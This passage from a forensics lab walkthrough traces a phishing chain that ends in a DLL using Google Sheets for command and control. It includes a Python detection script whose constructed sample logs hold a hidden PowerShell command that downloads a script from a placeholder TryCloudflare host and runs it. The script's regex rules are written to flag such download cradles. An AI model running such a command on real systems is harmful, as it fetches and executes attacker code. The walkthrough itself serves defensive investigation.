Walkthrough

Introduction

This lab presents a comprehensive forensic investigation into a sophisticated phishing attack that escalates into a multi-stage malware infection. The attack begins with a deceptively crafted email impersonating a government tax authority, designed to exploit social engineering tactics and provoke user interaction. The malicious email, disguised as a tax update notice, lures the victim into clicking a fraudulent hyperlink, initiating a chain of compromise that spans phishing, tunneling, script execution, payload delivery, and covert data exfiltration.

As the investigation unfolds, you will examine artifacts from a disk to trace the attacker’s methodology. The phishing email leads to a malicious webpage hosted on a free domain via InfinityFreeApp, which uses the Windows Search Protocol to launch a .search-ms file. This action silently executes a PowerShell command that pulls and runs a Python script from a TryCloudflare tunnel. The script proceeds to retrieve a ZIP archive containing a malicious DLL file, which is then deployed in the system's user directories. From there, the malware establishes a command-and-control (C2) channel by leveraging the Google Sheets API, allowing it to exfiltrate sensitive data and receive remote instructions undetected.
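The chain above leaves a distinct footprint in endpoint telemetry at each stage, which is what the Splunk portion of the lab is hunting for. The following Python is an added example (not the lab's own search or any BlueYard code) that runs a set of stage-level indicator rules over a handful of constructed Sysmon-style log lines and reports which hosts show several stages of the chain together. The field names (`host=`, `Image=`, `CommandLine=`, `TargetFilename=`, `DestinationHostname=`), the tunnel subdomain `example-words.trycloudflare.com`, the `203.0.113.25` share address and the `C:\Users\alice\...\core.dll` path are all assumptions made up for the sample; the regexes are illustrative, not the lab's answer.

```python
import re
from dataclasses import dataclass


@dataclass
class Finding:
    stage: str
    host: str
    line_no: int
    evidence: str


# One rule per stage of the chain described in the introduction. Each is a
# deliberately narrow regex over a single log line; these are assumed
# patterns for illustration, not the lab's Splunk searches.
RULES = {
    "search-ms protocol handler launched": re.compile(r"search-ms:", re.I),
    "powershell download cradle": re.compile(
        r"powershell.*?\b(Invoke-WebRequest|iwr|DownloadString|Invoke-Expression|iex)\b",
        re.I,
    ),
    "trycloudflare tunnel contact": re.compile(r"[a-z0-9-]+\.trycloudflare\.com", re.I),
    "dll written under a user profile": re.compile(r"C:\\Users\\[^\\]+\\.*\.dll\b", re.I),
    "google sheets api beacon": re.compile(r"sheets\.googleapis\.com", re.I),
}

# Constructed sample telemetry (Sysmon-like key=value lines). Hostnames,
# paths, the share address and the tunnel subdomain are invented.
SAMPLE_LOGS = [
    r'host=WS01 Image=C:\Windows\explorer.exe CommandLine="explorer.exe \"search-ms:query=TaxUpdate&crumb=location:\\\\203.0.113.25\\share\"" ParentImage=C:\Program Files\Google\Chrome\Application\chrome.exe',
    r'host=WS01 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell.exe -w hidden -c iwr https://example-words.trycloudflare.com/update.py -OutFile $env:TEMP\update.py; python $env:TEMP\update.py"',
    r'host=WS01 EventType=FileCreate TargetFilename=C:\Users\alice\AppData\Roaming\Updater\core.dll Image=C:\Python311\python.exe',
    r'host=WS01 EventType=NetworkConnect Image=C:\Windows\System32\rundll32.exe DestinationHostname=sheets.googleapis.com DestinationPort=443',
    r'host=WS02 Image=C:\Windows\System32\notepad.exe CommandLine="notepad.exe C:\Users\bob\notes.txt"',
]

HOST_RE = re.compile(r"\bhost=(\S+)")


def scan(lines):
    """Apply every stage rule to every line; return one Finding per hit."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = HOST_RE.search(line)
        host = m.group(1) if m else "unknown"
        for stage, pat in RULES.items():
            hit = pat.search(line)
            if hit:
                findings.append(Finding(stage, host, n, hit.group(0)))
    return findings


def chain_coverage(findings):
    """Set of chain stages observed anywhere in the scanned lines."""
    return {f.stage for f in findings}


def suspicious_hosts(findings, min_stages=3):
    """Hosts on which at least min_stages distinct stages were seen.

    A single indicator (one search-ms URI, one connection to a Google API)
    is weak on its own; several stages on the same host is the real signal.
    """
    stages_by_host = {}
    for f in findings:
        stages_by_host.setdefault(f.host, set()).add(f.stage)
    return {h for h, s in stages_by_host.items() if len(s) >= min_stages}


if __name__ == "__main__":
    found = scan(SAMPLE_LOGS)
    for f in found:
        print(f"line {f.line_no} [{f.host}] {f.stage}: {f.evidence}")
    print("hosts with a multi-stage chain:", sorted(suspicious_hosts(found)))
```

Run as-is it lists one finding per stage for WS01 and nothing for WS02, and only WS01 crosses the three-stage threshold. The per-host correlation is the point: each rule alone would page too often in a real fleet, whereas the co-occurrence of a `search-ms:` launch, a hidden PowerShell download and a DLL landing under `C:\Users` on the same machine is what merits a full disk-level investigation like this lab's.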

You will utilize tools such as Splunk, ChromeCacheView, and VirusTotal to uncover key indicators of compromise, trace the attacker’s activity, and attribute the attack to a broader threat landscape. By c
